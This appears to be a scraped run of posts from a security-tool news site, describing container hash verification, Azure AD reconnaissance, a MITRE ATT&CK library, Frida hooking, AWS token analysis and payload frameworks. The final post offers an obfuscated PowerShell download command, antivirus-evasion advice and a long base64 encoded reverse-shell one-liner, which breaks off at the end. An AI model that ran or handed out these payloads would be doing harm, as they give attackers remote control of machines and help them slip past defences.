[!] Found matching instance of '/usr/local/bin/staticcheck' at: merged/usr/local/bin/staticcheck with hash:73f89162bacda8dd2354021dc56dc2f3dba136e873e372312843cd895dde24a2
[!] Found matching instance of '/usr/local/go/bin/go' at: merged/usr/local/go/bin/go with hash:23afbfab4f35ac90d9841a6e05f0d1487b6e0c3a914ea8dab3676c6dde612495
[!] Found matching instance of '/var/lib/dpkg/info/apt.postrm' at: merged/var /lib/dpkg/info/apt.postrm with hash:6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c
[!] All components were identified and verified: (6/6)

Integrating with CI
Terrier has been designed to assist in the prevention of supply chain attacks. To utilise Terrier with CI's such as Github actions or CircleCI, the following example configurations might be useful.

CircleCI Example
config.yml
version: 2
jobs:
build:
machine: true
steps:
- checkout
- run:
name: Build Docker Image
command: |
docker build -t builditall .
- run:
name: Save Docker Image Locally
command: |
docker save builditall -o builditall.tar
- run:
name: Verify Docker Image Binaries
command: |
./terrier_linux_amd64
Terrier cfg.yml
mode:image
image: builditall.tar
files:
- name: '/bin/wget'
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2a'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41a'
- name: '/sbin/sulogin'
hashes:
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'

Github Actions Example
go.yml
name: Go
on: [push]
jobs:
build:
name: Build
runs-on: ubuntu-latest
steps:

- name: Get Code
uses: actions/checkout@master
- name: Build Docker Image
run: |
docker build -t builditall .
- name: Save Docker Image Locally
run: |
docker save builditall -o builditall.tar
- name: Verify Docker Image Binaries
run: |
./terrier_linux_amd64
Terrier cfg.yml
mode: image
image: builditall.tar
files:
- name: '/bin/wget'
hashes:
- hash: '8b7c559b8cccca0d30d01bc4b5dc944766208a53d18a03aa8afe97252207521f'
- hash: '22e88c7d6da9b73fbb515ed6a8f6d133c680527a799e3069ca7ce346d90649b2a'
- hash: '60a2c86db4523e5d3eb41a247b4e7042a21d5c9d483d59053159d9ed50c8aa41a'
- name: '/bin/sbin/sulogin'
hashes:
- hash: '9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96aaa'

Converting SHASUM 256 Hashes to a Terrier Config File
Sometimes the source of SHA256 hashes is produced from other tools in the following format:
6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c  ./var/lib/dpkg/info/apt.postrm
6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2 ./var/lib/dpkg/info/mawk.postinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.preinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.postrm
8a278d8f860ef64ae49a2d3099b698c79dd5184db154fdeaea1bc7544c2135df ./var/lib/dpkg/info/debconf.postrm
1e6edefb6be6eb6fe8dd60ece5544938197b2d1d38a2d4957c069661bc2591cd ./var/lib/dpkg/info/base-files.prerm
198c13dfc6e7ae170b48bb5b997793f5b25541f6e998edaec6e9812bc002915f ./var/lib/dpkg/info/passwd.postinst
The format above contains the data we need for Terrier but is in the wrong format. We have included a script called convertSHA.sh which can be used to convert a file with the file paths and hash values as seen above into a valid Terrier config file.
This can be seen in the following example:
# cat hashes-SHA256.txt
6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c ./var/lib/dpkg/info/apt.postrm
6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2 ./var/lib/dpkg/info/mawk.postinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.preinst
fd72e78277680d02dcdb5d898fc9e3fed00bf011ccf31deee0f9e5f4cf299055 ./var/lib/dpkg/info/lsb-base.postrm
8a278d8f860ef64ae49a2d3099b698c79dd5184db154fdeaea1bc7544c2135df ./var/lib/dpkg/info/debconf.postrm
1e6edefb6be6eb6fe8dd60ece5544938197b2d1d38a2d4957c069661bc2591cd ./var/lib/dpkg/info/base-files.prerm
198c13dfc6e7ae170b48bb5b997793f5b25541f6e998edaec6e9812bc002915f ./var/lib/dpkg/info/passwd.postinst

# ./convertSHA.sh hashes-SHA256.txt output.yml
Converting hashes-SHA256.txt to Terrier YML: output.yml

# cat output.yml
mode: image
#mode: container
image: image.tar
#path: path/to/containe r/merged
#verbose: true
#veryverbose: true
files:
- name: '/var/lib/dpkg/info/apt.postrm'
hashes:
- hash: '6a8f9af3abcfb8c6e35887d11d41a83782b50f5766d42bd1e32a38781cba0b1c'
- name: '/var/lib/dpkg/info/mawk.postinst'
hashes:
- hash: '6374f7996297a6933c9ccae7eecc506a14c85112bf1984c12da1f975dab573b2'


ROADtools - The Azure AD Exploration Framework

$
0
0

(Rogue Office 365 and Azure (active) Directory tools)

ROADtools is a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool.

ROADlib

ROADlib is a library that can be used to authenticate with Azure AD or to build tools that integrate with a database containing ROADrecon data. The database model in ROADlib is automatically generated based on the metadata definition of the Azure AD internal API. ROADlib lives in the ROADtools namespace, so to import it in your scripts use from roadtools.roadlib import X

ROADrecon

ROADrecon is a tool for exploring information in Azure AD from both a Red Team and Blue Team perspective. In short, this is what it does:
  • Uses an automatically generated metadata model to create an SQLAlchemy backed database on disk.
  • Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database.
  • Provide plugins to query this database and output it to a useful format.
  • Provide an extensive interface built in Angular that queries the offline database directly for its analysis.
ROADrecon uses async Python features and is only compatible with Python 3.6-3.8 (development is done with Python 3.8).

Installation
There are multiple ways to install ROADrecon:
Using a published version on PyPi
Stable versions can be installed with pip install roadrecon. This will automatically add the roadrecon command to your PATH.
Using a version from GitHub
Every commit to master is automatically built into a release version with Azure Pipelines. This ensures that you can install the latest version of the GUI without having to install npm and all it's dependencies. Simply download the roadlib and roadrecon zip files from the Azure Pipelines artifacts, then unzip both and install them in the correct order (roadlib first):
pip install roadlib/
pip install roadrecon/
You can also install them in development mode with pip install -e roadlib/.
Developing the front-end
If you want to make changes to the Angular front-end, you will need to have node and npm installed. Then install the components from git:
git clone https://github.com/dirkjanm/roadtools.git
pip install -e roadlib/
pip install -e roadrecon/
cd roadrecon/frontend/
npm install
You can run the Angular frontend with npm start or ng serve using the Angular CLI from the roadrecon/frontend/ directory. To build the JavaScript files into ROADrecon's dist_gui directory, run npm build.

Developing
See this README for more info.


Elemental - An MITRE ATTACK Threat Library

$
0
0

Elemental is a centralized threat library of MITRE ATT&CK techniques, Atomic Red Team tests, and over 280 Sigma rules. It provides an alternative way to explore the ATT&CK dataset, mapping relevant Atomic Red Team tests and Sigma rules to their respective technique. Elemental allows defenders to create custom ATT&CK Techniques and upload Sigma Rules. The ATT&CK dataset was collected via the hunters-forge attackcti Python client. Atomic Red Team tests were imported from the Atomic Red Team GitHub repository. Sigma rules were imported from Sigma's GitHub rule collection if they contained ATT&CK tags.
This platform was conceived as a capstone project for University of California Berkeley's Master of Information and Cybersecurity program. We look forward to community feedback for new ideas and improvements. This instance of Elemental is experimental and not configured for production deployment. Please see Django documentation on configuring a production server.

Features
  • View ATT&CK Technique information
  • View Atomic Red Team tests in Markdown and Yaml
  • View Sigma rules in Yaml
  • Add new ATT&CK Techniques (currently only available from Django Admin panel)
  • Upload new Sigma rules (currently only available from Django Admin panel)

Screenshots
Main Elements View


Technique View


Atomics View


Sigma Rules View

Installation
git clone https://github.com/Elemental-attack/Elemental.git
cd Elemental/elemental
pip install -r requirements.txt
python manage.py runserver
Default Django admin page crendentials: user: elemental | password: berkelium

Thanks
Mitre ATT&CK - https://github.com/mitre/cti
Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
ATT&CK Python Client - https://github.com/hunters-forge/ATTACK-Python-Client
Sigma - https://github.com/Neo23x0/sigma

TODO
  • Log Source mapping for Techniques and Sigma rules
  • Custom Techniques add
  • Custom Sigma Rules upload
  • Sigmac to convert rules to desired SIEM
  • Filter capabilities on Elements page
  • Integrate update functionality for ATT&CK, Atomic Red Team, and Sigma rules repo

Authors


Runtime Mobile Security (RMS) - A Powerful Web Interface That Helps You To Manipulate Android Java Classes And Methods At Runtime

$
0
0

Runtime Mobile Security (RMS), powered by FRIDA, is a powerful web interface that helps you to manipulate Android Java Classes and Methods at Runtime.
You can easily dump all the loaded classes and relative methods, hook everything on the fly, trace methods args and return value, load custom scripts and many other useful stuff.

by @mobilesecurity_

General Info
Runtime Mobile Security (RMS) is currently supporting Android devices only.
It has been tested on MacOS and with the following devices:
  • AVD emulator
  • Genymotion emulator
  • Amazon Fire Stick 4K
It should also work well on Windows and Linux but some minor adjustments may be needed.
Do not connect more than one device at the same time. RMS is not so smart at the moment

Prerequisites
FRIDA server up and running on the target device
Refer to the official FRIDA guide for the installation: https://frida.re/docs/android/

Known issues
  • Sometime RMS fails to load complex methods. Use a filter when this happens or feel free to improve the algo (default.js).
  • Code is not optimized

Improvements
  • iOS support
  • Feel free to send me your best JS sript via a Pull request. I'll be happy to bundle all the best as default scripts in the next RMS release. e.g.
    • root detection bypass
    • ssl pinning bypass
    • reflection detection
    • etc...

Installation
  1. (optional) Create a python virtual environment
  2. pip3 install -r requirements.txt
  3. python3 mobilesecurity.py

Usage

1. Run your favorite app by simply inserting its package name
NOTE RMS attachs a persistence process called com.android.systemui to get the list of all the classes that are already loaded in memory before the launch of the target app. If you have an issue with it, try to find a different package that works well on your device. You can set another default package by simply editing the config.json file.


2. Check which Classes and Methods have been loaded in memory


3. Hook on the fly Classes/Methods and trace their args and return values



4. Select a Class and generate on the fly an Hook template for all its methods



5. Easily detect new classes that have been loaded in memory


6. Inject your favorite FRIDA CUSTOM SCRIPTS on the fly
Just add your .js files inside the custom_script folder and they will be automatically loaded by the web interface ready to be executed.


Acknowledgements
Special thanks to the following Open Source projects for the inspiration:
RootBeer Sample is the DEMO app used to show how RMS works. RootBeer is an amazing root detection library. I decided to use the Sample app as DEMO just to show that, as every client-side only check, its root detection logic can be easily bypassed if not combined with a server-side validation.


SkyWrapper - Tool That Helps To Discover Suspicious Creation Forms And Uses Of Temporary Tokens In AWS

$
0
0

SkyWrapper is an open-source project which analyzes behaviors of temporary tokens created in a given AWS account. The tool is aiming to find suspicious creation forms and uses of temporary tokens to detect malicious activity in the account. The tool analyzes the AWS account, and creating an excel sheet includes all the currently living temporary tokens. A summary of the finding printed to the screen after each run.

SkyWrapper DEMO:


Usage
  1. Fill the required data in the config file
  2. Make sure your users have the satisfied permissions for running the script (You can check this in the IAM at the summary page of the user)
  3. Run the python script
python SkyWrapper.py

Permissions
For running this script, you will need at least the following permissions policy:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "S3TrailBucketPermissions",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucketMultipartUploads",
"s3:ListBucket",
"s3:GetBucketLocation",
"s3:ListMultipartUploadParts"
],
"Resource": [
"arn:aws:s3:::{cloudtrail_bucket_name}/*",
"arn:aws:s3:::{cloudtrail_bucket_name}
]
},
{
"Sid": "IAMReadPermissions",
"Effect": "Allow",
"Action": [
"iam:ListAttachedRolePolicies",
"iam:ListRolePolicies",
"iam:GetRolePolicy",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListRoles"
],
"Resource": [
"arn:aws:iam::*:policy/*",
"arn:aws:iam::*:role/*"
]
},
{
"Sid": "GLUEReadWritePermissions",
"Effect": "Allow",
"Action": [
"glue:CreateTable",
"glue:CreateDatabase",
"glue:GetTable",
"glue:GetDatabase"
],
"Resource": "*"
},
{
"Sid": "CLOUDTRAILReadPermissions",
"Effect": "Allow",
"Action": [
"cloudtrail:DescribeTrails"
],
"Resource": "*"
},
{
"Sid": "ATHENAReadPermissions",
"Effect": "Allow",
"Action": [
"athena:GetQueryResults",
"athena:StartQueryExecution",
"athena:GetQueryExecution"
],
"Resource": "arn:aws:athena:*:*:workgroup/*"
},
{
"Sid": "S3AthenaResultsBucketPermissions",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:GetObject",
"s3:ListBucketMultipartUploads",
"s3:CreateBucket",
"s3:ListBucket",
"s3:GetBucketLocation",
"s3:ListMultipartUploadParts"
],
"Resource": "arn:aws:s3:::aws-athena-query-results-*"
}
]
}
Make sure you change the "{trail_bucket}" with your trail's bucket name!
In case you have more than one trail, which you want to use the script also on them, you have to add them as well to the policy permissions resource section.

Configuration
"config.yaml" is the configuration file. In most cases, you can leave the configuration as is. In case you need to change it, the configuration file is documented.
athena: # Athena configuration
database_name: default # The name of the database Athena uses for querying the trail bucket.
table_name: cloudtrail_logs_{table_name} # The table name of the trail bucket name
output_location: s3://aws-athena-query-results-{account_id}-{region}/ # The default output location bucket for the query results
output:
excel_output_file: run_results_{trail}_{account_id}-{date}.xlsx # Excel results file
summary_output_file: run_summary_{trail}_{account_id}-{date}.txt # Summary text results file
verify_https: True # Enable/ Disable verification of SSL certificates for HTTP requests
account:
account_id: 0 # The account id - Keep it as 0 in case you don't know it
aws_access_key_id: # If you keep it empty, the script will look after the default AWS credentials stored in ~/.aws/credentials
aws_secret_access_key: # If you keep it empty, the script will look after the default AWS credentials stored in ~/.aws/credentials
aws_session_token: # If you keep it empty, the script will look after the default AWS credentials stored in ~/.aws/credentials

References:
For more comments, suggestions, or questions, you can contact Omer Tsarfati (@OmerTsarfati) and CyberArk Labs. You can find more projects developed by us in https://github.com/cyberark/.


Thoron Framework - Tool To Generate Simple Payloads To Provide Linux TCP Attack

$
0
0

About Thoron Framework
Thoron Framework is a Linux post-exploitation framework that exploit
Linux tcp vulnerability to get shell-like connection. Thoron Framework
is used to generate simple payloads to provide Linux tcp attack.

Getting started

Thoron installation
cd thoron
chmod +x install.sh
./install.sh

Thoron uninstallation
cd thoron
chmod +x uninstall.sh
./uninstall.sh

Thoron Framework execution
To execute Thoron Framework you
should execute the following command.
thoron

Why Thoron Framework
  • Simple and clear UX/UI.
Thoron Framework has a simple and clear UX/UI. 
It is easy to understand and it will be easier
for you to master the Thoron Framework.
  • A lot of different payloads.
There are a lot of different payloads in Thoron 
Framework such as Shell, Python and C payloads.
  • Powerful ThorCat listener.
There is a powerful ThorCat listener in Thoron 
Framework that supports secure SSL connection
and other useful functions.


Thoron Framework disclaimer
Usage of the Thoron Framework for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



INTERCEPT - Policy As Code Static Analysis Auditing

$
0
0

Stupidly easy to use, small footprint Policy as Code subsecond command-line scanner that leverages the power of the fastest multi-line search tool to scan your codebase. It can be used as a linter, guard rail control or simple data collector and inspector. Consider it a weaponized ripgrep. Works on Mac, Linux and Windows.

How it works
  • intercept binary
  • policies yaml file
  • (included) latest ripgrep binary
  • (optional) exceptions yaml file
Intercept merges environment flags, policies yaml, exceptions yaml to generate a global config. Uses ripgrep to scan a target path for policy breaches recursively against your code and generates a human readable detailed output of the findings.

Use cases
  • Simple and powerful free drop-in alternative for Hashicorp Sentinel if you are more comfortable writing and maintaining regular expressions than using a new custom policy language.
  • Do you find Open Policy Agentrego files too much sugar for your pipeline?
  • Captures the patterns from git-secrets and trufflehog and can prevent sensitive information to run through your pipeline. (trufflehog regex)
  • Identifies policy breach (files and line numbers), reports solutions/suggestions to its findings making it a great tool to ease onboarding developer teams to your unified deployment pipeline.
  • Can enforce style-guides, coding-standards, best practices and also report on suboptimal configurations.
  • Can collect patterns or high entropy data and output it in multiple formats.
  • Anything you can crunch on a regular expression can be actioned on.

Latest Release :
  # Standard package (intercept + ripgrep) for individual platforms
-- intercept-rg-linux.zip
-- intercept-rg-macos.zip
-- intercept-rg-win.zip

# Clean package (intercept only) for individual platforms
-- core-intercept-linux.zip
-- core-intercept-macos.zip
-- core-intercept-win.zip

# Full package (intercept + ripgrep) for all platforms
-- x-intercept.zip

# Package needed to fully use the Makefile
-- setup-buildpack.zip

# Package of the latest compatible release of ripgrep (doesn't include intercept)
-- i-ripgrep-linux.zip
-- i-ripgrep-macos.zip
-- i-ripgrep-win.zip

Download the standard package for your platform to get started

Used in production
INTERCEPT was created to lint thousands of infra deployments a day with minor human intervention, the first MVP been running for a year already with no reported flaws. Keep in mind INTERCEPT is not and does not pretend to be a security tool. It's easy to circumvent a regex pattern once you know it, but the main objective of this tool is to pro-actively help the developers fix their code and assist with style suggestions to keep the codebase clean and avoid trivial support tickets for the uneducated crowd.

Inspired by

Standing on the shoulders of giants

Why ripgrep ? Why is it fast?
  • It is built on top of Rust's regex engine. Rust's regex engine uses finite automata, SIMD and aggressive literal optimizations to make searching very fast. (PCRE2 support) Rust's regex library maintains performance with full Unicode support by building UTF-8 decoding directly into its deterministic finite automaton engine.
  • It supports searching with either memory maps or by searching incrementally with an intermediate buffer. The former is better for single files and the latter is better for large directories. ripgrep chooses the best searching strategy for you automatically.
  • Applies ignore patterns in .gitignore files using a RegexSet. That means a single file path can be matched against multiple glob patterns simultaneously.
  • It uses a lock-free parallel recursive directory iterator, courtesy of crossbeam and ignore.

Benchmark ripgrep
ToolCommandLine countTime
ripgrep (Unicode)rg -n -w '[A-Z]+_SUSPEND'4500.106s
git grepLC_ALL=C git grep -E -n -w '[A-Z]+_SUSPEND'4500.553s
The Silver Searcherag -w '[A-Z]+_SUSPEND'4500.589s
git grep (Unicode)LC_ALL=en_US.UTF-8 git grep -E -n -w '[A-Z]+_SUSPEND'4502.266s
siftsift --git -n -w '[A-Z]+_SUSPEND'4503.505s
ackack -w '[A-Z]+_SUSPEND'18786.823s
The Platinum Searcherpt -w -e '[A-Z]+_SUSPEND'45014.208s

Tests

Test Suite runs with venom
venom run tests/suite.yml

Vulnerabilities

Scanned with Sonatype Nancy
Audited dependencies:41,Vulnerable:0
from Sonatype OSS Index


Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.

$
0
0

PowerShell script for connecting to a remote host.
Remote host will have full control over client's PowerShell and all its underlying commands.
Tested with PowerShell v5.1.18362.752 on Windows 10 Enterprise OS (64 bit).
Made for educational purposes. I hope it will help!

How to Run
Change the IP address and port number inside the script.
Open the PowerShell from \src\ and run the commands shown below.
Set the execution policy:
Set-ExecutionPolicy Unrestricted
Run the script:
.\powershell_reverse_tcp.ps1
Or run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

PowerShell Obfuscation
Try to bypass an antivirus or some other security mechanisms by obfuscating your scripts.
You can see such obfuscation in the example below.
Original PowerShell command:
(New-Object Net.WebClient).DownloadFile($url, $out)
Obfuscated PowerShell command:
& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'
Check the original PowerShell script here and the obfuscated one here.
Besides manual obfuscation, the original PowerShell script was also obfuscated with Invoke-Obfuscation. Credits to the author!
Search the Internet for additional methods and obfuscation techniques.

PowerShell Encoded Command
Use the one-liner below if you don't want to leave any artifacts behind.
Encoded script will prompt for input. See the slightly altered script in my other project.
To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -EncodedCommand JABhAGQAZAByACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAEkAUAAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwANAAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7AA0ACgAkAHAAbwByAHQAIAA9ACAAJAAoAFIAZQBhAGQALQBIAG8AcwB0ACAALQBQAHIAbwBtAHAAdAAgACIARQBuAHQAZQByACAAcABvAHIAdAAgAG4AdQBtAGIAZQByACIAKQAuAFQAcgBpAG0AKAApADsADQAKAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwANAAoAaQBmACAAKAAkAGEAZABkAHIALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQAgAC0AbwByACAAJABwAG8AcgB0AC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAKQAgAHsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsADQAKAH0AIABlAGwAcwBlACAAewANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAiADsADQAKAAkAVwByAGkAdABlA   C0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIABHAGkAdABIAHUAYgAgAHIAZQ   BwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACAAIAAjACIAOwANAAoACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACAAIwAiADsADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwANAAoACQAkAHMAbwBjAGsAZQB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHUAbABsADsADQAKAAkAJABiAHU   AZgBmAGUAcgAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHcAcgBpAHQAZQByACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHIAZQBzAHUAbAB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJAHQAcgB5ACAAewANAAoACQAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAdAAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzAGEAcgB5AA0ACgAJAAkAJABzAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAkAGEAZABkAHIALAAgACQAcABvAHIAdAApADsADQAKAAkACQAkAHMAdAByAGUAYQBtACAAPQAgACQAcwBvAGMAawBlAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwANAAoACQAJACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAA7AA0ACgAJAAkAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAHMAYwBpAGkARQBuAGMAbwBkAGkAbgBnADsADQAKAAkACQAkAHcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7AA0ACgAJAAkAJAB3AHIAaQB0   AGUAcgAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7AA0ACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAaQBzACAAdQBwACAAYQBuAGQAIAByAHUAbgBuAGkAbgBnAC4ALgAuACIAOwANAAoACQAJAGQAbwAgAHsADQAKAAkACQAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7AA0ACgAJAAkACQBkAG8AIAB7AA0ACgAJAAkACQAJACQAYgB5AHQAZQBzACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwANAAoACQAJAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AA0ACgAJAAkACQAJAAkAJABkAGEAdABhACAAPQAgACQAZABhAHQAYQAgACsAIAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAKQA7AA0ACgAJAAkACQAJAH0AIABlAGwAcwBlACAAewANAAoACQAJAAkACQAJACQAZABhAHQAYQAgAD0AIAAiAGUAeABpAHQAIgA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0AHIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAOwANAAoACQAJAAkAaQBmACAAKAAkAGQAYQB0AGEALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAAgAC0AYQBuAGQAIAAkAGQAYQB0AGEAI   